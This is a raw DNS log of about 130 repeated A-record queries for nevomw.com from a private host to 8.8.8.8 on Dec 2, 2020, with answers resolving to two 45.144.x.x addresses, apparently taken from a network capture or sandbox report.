                                            Dec 2, 2020 11:53:24.321515083 CET192.168.2.68.8.8.80x578fStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:24.746162891 CET192.168.2.68.8.8.80x2c4Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:25.162528038 CET192.168.2.68.8.8.80x78edStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:25.535120010 CET192.168.2.68.8.8.80x35c3Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:25.947319984 CET192.168.2.68.8.8.80x95cdStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:26.361608982 CET192.168.2.68.8.8.80x885bStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:26.781534910 CET192.168.2.68.8.8.80xae0fStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:27.201503992 CET192.168.2.68.8.8.80x63d9Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:27.631100893 CET192.168.2.68.8.8.80xf26cStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:28.056104898 CET192.168.2.68.8.8.80xa306Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:28.488528967 CET192.168.2.68.8.8.80x8c46Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:28.910182953 CET192.168.2.68.8.8.80xe388Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:29.335936069 CET192.168.2.68.8.8.80xedd5Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:29.746006012 CET192.168.2.68.8.8.80xb4dcStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:30.157058954 CET192.168.2.68.8.8.80xb5b0Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:30.534432888 CET192.168.2.68.8.8.80x716dStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:30.950144053 CET192.168.2.68.8.8.80x3e73Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:31.414361000 CET192.168.2.68.8.8.80x516aStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:31.786268950 CET192.168.2.68.8.8.80x2781Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:32.222188950 CET192.168.2.68.8.8.80x817fStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:32.588006020 CET192.168.2.68.8.8.80xfeeStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:33.002825975 CET192.168.2.68.8.8.80x6d88Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:33.441160917 CET192.168.2.68.8.8.80x7b98Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:33.848555088 CET192.168.2.68.8.8.80xd989Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:34.279545069 CET192.168.2.68.8.8.80xe9d9Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:34.717075109 CET192.168.2.68.8.8.80x52bcStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:35.146568060 CET192.168.2.68.8.8.80x3eeStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:35.539638042 CET192.168.2.68.8.8.80x97e8Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:35.924839973 CET192.168.2.68.8.8.80x2578Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:36.347860098 CET192.168.2.68.8.8.80x309aStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:36.785064936 CET192.168.2.68.8.8.80xa809Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:37.224658012 CET192.168.2.68.8.8.80xd848Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:37.669658899 CET192.168.2.68.8.8.80xf248Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:38.092999935 CET192.168.2.68.8.8.80x48f6Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:38.512728930 CET192.168.2.68.8.8.80xfe47Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:38.875746965 CET192.168.2.68.8.8.80xc8e2Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:39.301574945 CET192.168.2.68.8.8.80xfe89Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:39.725230932 CET192.168.2.68.8.8.80x6fc5Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:40.219691038 CET192.168.2.68.8.8.80x392fStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:40.580743074 CET192.168.2.68.8.8.80x85eStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:41.038954973 CET192.168.2.68.8.8.80x9a85Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:41.423147917 CET192.168.2.68.8.8.80x5e69Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:41.821149111 CET192.168.2.68.8.8.80x2f9aStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:42.263540030 CET192.168.2.68.8.8.80xa075Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:44.639374018 CET192.168.2.68.8.8.80xd470Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:45.021672964 CET192.168.2.68.8.8.80x6e0aStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:45.443512917 CET192.168.2.68.8.8.80xf72cStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:45.885236025 CET192.168.2.68.8.8.80x8decStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:46.304502964 CET192.168.2.68.8.8.80xe962Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:46.728537083 CET192.168.2.68.8.8.80xd3f1Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:47.133272886 CET192.168.2.68.8.8.80xc1ebStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:47.572877884 CET192.168.2.68.8.8.80x690aStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:47.995712996 CET192.168.2.68.8.8.80xa50Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:48.408747911 CET192.168.2.68.8.8.80x1b9bStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:48.832439899 CET192.168.2.68.8.8.80x494bStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:49.251580000 CET192.168.2.68.8.8.80x291dStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:49.627768993 CET192.168.2.68.8.8.80x2409Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:50.035084009 CET192.168.2.68.8.8.80xec53Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:50.434282064 CET192.168.2.68.8.8.80x9c3aStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:50.894686937 CET192.168.2.68.8.8.80x799fStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:51.414562941 CET192.168.2.68.8.8.80xcf48Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:51.783464909 CET192.168.2.68.8.8.80xcd04Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:52.171829939 CET192.168.2.68.8.8.80x3126Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:52.585572958 CET192.168.2.68.8.8.80xa957Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:53.006575108 CET192.168.2.68.8.8.80x455Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:53.381268024 CET192.168.2.68.8.8.80x37f3Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:53.810909986 CET192.168.2.68.8.8.80x3db8Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:54.208628893 CET192.168.2.68.8.8.80xe762Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:54.629021883 CET192.168.2.68.8.8.80x9e82Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:55.050055027 CET192.168.2.68.8.8.80x58deStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:55.423598051 CET192.168.2.68.8.8.80xb965Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:55.850387096 CET192.168.2.68.8.8.80xdae0Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:56.248869896 CET192.168.2.68.8.8.80xad39Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:56.647577047 CET192.168.2.68.8.8.80x7da5Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:57.027770042 CET192.168.2.68.8.8.80x4cd8Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:57.430881977 CET192.168.2.68.8.8.80x1880Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:57.886060953 CET192.168.2.68.8.8.80x648cStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:58.272211075 CET192.168.2.68.8.8.80x514cStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:58.649456024 CET192.168.2.68.8.8.80xba0dStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:59.079360962 CET192.168.2.68.8.8.80x90cStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:59.472974062 CET192.168.2.68.8.8.80xbdf9Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:59.913703918 CET192.168.2.68.8.8.80x6ecbStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:00.307252884 CET192.168.2.68.8.8.80xa4edStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:00.705884933 CET192.168.2.68.8.8.80x49b8Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:01.120301008 CET192.168.2.68.8.8.80x1f48Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:01.509221077 CET192.168.2.68.8.8.80x6a03Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:01.956480980 CET192.168.2.68.8.8.80x917eStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:02.397713900 CET192.168.2.68.8.8.80xb219Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:02.774084091 CET192.168.2.68.8.8.80xedd8Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:03.318240881 CET192.168.2.68.8.8.80x3075Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:03.729955912 CET192.168.2.68.8.8.80x441eStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:04.140897989 CET192.168.2.68.8.8.80xcf0fStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:04.599097967 CET192.168.2.68.8.8.80xd7c9Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:04.985646963 CET192.168.2.68.8.8.80x70ffStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:05.616873026 CET192.168.2.68.8.8.80xc671Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:06.028312922 CET192.168.2.68.8.8.80x5979Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:06.426261902 CET192.168.2.68.8.8.80xc8aaStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:06.822459936 CET192.168.2.68.8.8.80x2a0fStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:07.286889076 CET192.168.2.68.8.8.80x3c98Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:07.661478996 CET192.168.2.68.8.8.80x5e6Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:08.032965899 CET192.168.2.68.8.8.80x1ca3Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:08.417562962 CET192.168.2.68.8.8.80xc7adStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:08.915608883 CET192.168.2.68.8.8.80xc810Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:09.930711985 CET192.168.2.68.8.8.80xd073Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:11.526834011 CET192.168.2.68.8.8.80x49bfStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:11.984951019 CET192.168.2.68.8.8.80x7151Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:12.548167944 CET192.168.2.68.8.8.80x788dStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:12.928486109 CET192.168.2.68.8.8.80xc0fbStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:13.366381884 CET192.168.2.68.8.8.80x2adaStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:13.817374945 CET192.168.2.68.8.8.80xa6cdStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:14.184145927 CET192.168.2.68.8.8.80xf369Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:14.635570049 CET192.168.2.68.8.8.80x1aa4Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:15.045031071 CET192.168.2.68.8.8.80x2b15Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:15.459170103 CET192.168.2.68.8.8.80xf9e6Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:15.820738077 CET192.168.2.68.8.8.80x67f5Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:16.267661095 CET192.168.2.68.8.8.80x7c0bStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:16.631093979 CET192.168.2.68.8.8.80x8ff2Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:17.072542906 CET192.168.2.68.8.8.80xc015Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:17.425602913 CET192.168.2.68.8.8.80x9eb2Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:17.846313953 CET192.168.2.68.8.8.80xd2f4Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:18.235343933 CET192.168.2.68.8.8.80x6bdbStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:18.702311039 CET192.168.2.68.8.8.80x2475Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:19.151036978 CET192.168.2.68.8.8.80x9689Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:19.527997017 CET192.168.2.68.8.8.80x5042Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:19.926543951 CET192.168.2.68.8.8.80x8aa6Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:20.382962942 CET192.168.2.68.8.8.80x3008Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:20.773883104 CET192.168.2.68.8.8.80xd77Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:21.157676935 CET192.168.2.68.8.8.80x3028Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:21.525206089 CET192.168.2.68.8.8.80xd69eStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:21.906178951 CET192.168.2.68.8.8.80xbebaStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:22.302553892 CET192.168.2.68.8.8.80x25d0Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:22.729923010 CET192.168.2.68.8.8.80x5cf9Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:23.100929022 CET192.168.2.68.8.8.80x7f4aStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:23.510452986 CET192.168.2.68.8.8.80x9134Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:23.916831970 CET192.168.2.68.8.8.80xacccStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:24.330015898 CET192.168.2.68.8.8.80xf771Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:24.777729988 CET192.168.2.68.8.8.80xa872Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:25.196018934 CET192.168.2.68.8.8.80xb823Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:25.633527994 CET192.168.2.68.8.8.80xa121Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:26.057401896 CET192.168.2.68.8.8.80xb601Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:26.484194040 CET192.168.2.68.8.8.80x76f6Standard query (0)nevomw.comA (IP address)IN (0x0001)

                                            DNS Answers

                                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                            Dec 2, 2020 11:53:30.561573029 CET8.8.8.8192.168.2.60x716dNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:30.977451086 CET8.8.8.8192.168.2.60x3e73No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:30.977451086 CET8.8.8.8192.168.2.60x3e73No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:31.441651106 CET8.8.8.8192.168.2.60x516aNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:31.441651106 CET8.8.8.8192.168.2.60x516aNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:31.813337088 CET8.8.8.8192.168.2.60x2781No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:31.813337088 CET8.8.8.8192.168.2.60x2781No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:32.249223948 CET8.8.8.8192.168.2.60x817fNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:32.249223948 CET8.8.8.8192.168.2.60x817fNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:32.615169048 CET8.8.8.8192.168.2.60xfeeNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:32.615169048 CET8.8.8.8192.168.2.60xfeeNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:33.029988050 CET8.8.8.8192.168.2.60x6d88No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:33.029988050 CET8.8.8.8192.168.2.60x6d88No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:33.468313932 CET8.8.8.8192.168.2.60x7b98No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:33.468313932 CET8.8.8.8192.168.2.60x7b98No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:33.875742912 CET8.8.8.8192.168.2.60xd989No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:33.875742912 CET8.8.8.8192.168.2.60xd989No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:34.306705952 CET8.8.8.8192.168.2.60xe9d9No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:34.306705952 CET8.8.8.8192.168.2.60xe9d9No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:34.744317055 CET8.8.8.8192.168.2.60x52bcNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:34.744317055 CET8.8.8.8192.168.2.60x52bcNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:35.173808098 CET8.8.8.8192.168.2.60x3eeNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:35.173808098 CET8.8.8.8192.168.2.60x3eeNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:35.567707062 CET8.8.8.8192.168.2.60x97e8No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:35.567707062 CET8.8.8.8192.168.2.60x97e8No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:35.962656021 CET8.8.8.8192.168.2.60x2578No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:35.962656021 CET8.8.8.8192.168.2.60x2578No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:36.375144005 CET8.8.8.8192.168.2.60x309aNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:36.375144005 CET8.8.8.8192.168.2.60x309aNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:36.812170029 CET8.8.8.8192.168.2.60xa809No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:36.812170029 CET8.8.8.8192.168.2.60xa809No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:37.251827002 CET8.8.8.8192.168.2.60xd848No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:37.251827002 CET8.8.8.8192.168.2.60xd848No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:37.696755886 CET8.8.8.8192.168.2.60xf248No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:37.696755886 CET8.8.8.8192.168.2.60xf248No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:38.120366096 CET8.8.8.8192.168.2.60x48f6No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:38.120366096 CET8.8.8.8192.168.2.60x48f6No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:38.539983034 CET8.8.8.8192.168.2.60xfe47No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:38.539983034 CET8.8.8.8192.168.2.60xfe47No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:38.903022051 CET8.8.8.8192.168.2.60xc8e2No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:38.903022051 CET8.8.8.8192.168.2.60xc8e2No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:39.328754902 CET8.8.8.8192.168.2.60xfe89No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:39.328754902 CET8.8.8.8192.168.2.60xfe89No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:39.752509117 CET8.8.8.8192.168.2.60x6fc5No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:39.752509117 CET8.8.8.8192.168.2.60x6fc5No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:40.246764898 CET8.8.8.8192.168.2.60x392fNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:40.246764898 CET8.8.8.8192.168.2.60x392fNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:40.608048916 CET8.8.8.8192.168.2.60x85eNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:40.608048916 CET8.8.8.8192.168.2.60x85eNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:41.066154957 CET8.8.8.8192.168.2.60x9a85No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:41.066154957 CET8.8.8.8192.168.2.60x9a85No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:41.450228930 CET8.8.8.8192.168.2.60x5e69No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:41.450228930 CET8.8.8.8192.168.2.60x5e69No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:41.848258972 CET8.8.8.8192.168.2.60x2f9aNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:41.848258972 CET8.8.8.8192.168.2.60x2f9aNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:42.301194906 CET8.8.8.8192.168.2.60xa075No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:42.301194906 CET8.8.8.8192.168.2.60xa075No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:44.666498899 CET8.8.8.8192.168.2.60xd470No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:44.666498899 CET8.8.8.8192.168.2.60xd470No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:45.048715115 CET8.8.8.8192.168.2.60x6e0aNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:45.048715115 CET8.8.8.8192.168.2.60x6e0aNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:45.470597029 CET8.8.8.8192.168.2.60xf72cNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:45.470597029 CET8.8.8.8192.168.2.60xf72cNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:45.913047075 CET8.8.8.8192.168.2.60x8decNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:45.913047075 CET8.8.8.8192.168.2.60x8decNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:46.331456900 CET8.8.8.8192.168.2.60xe962No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:46.331456900 CET8.8.8.8192.168.2.60xe962No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
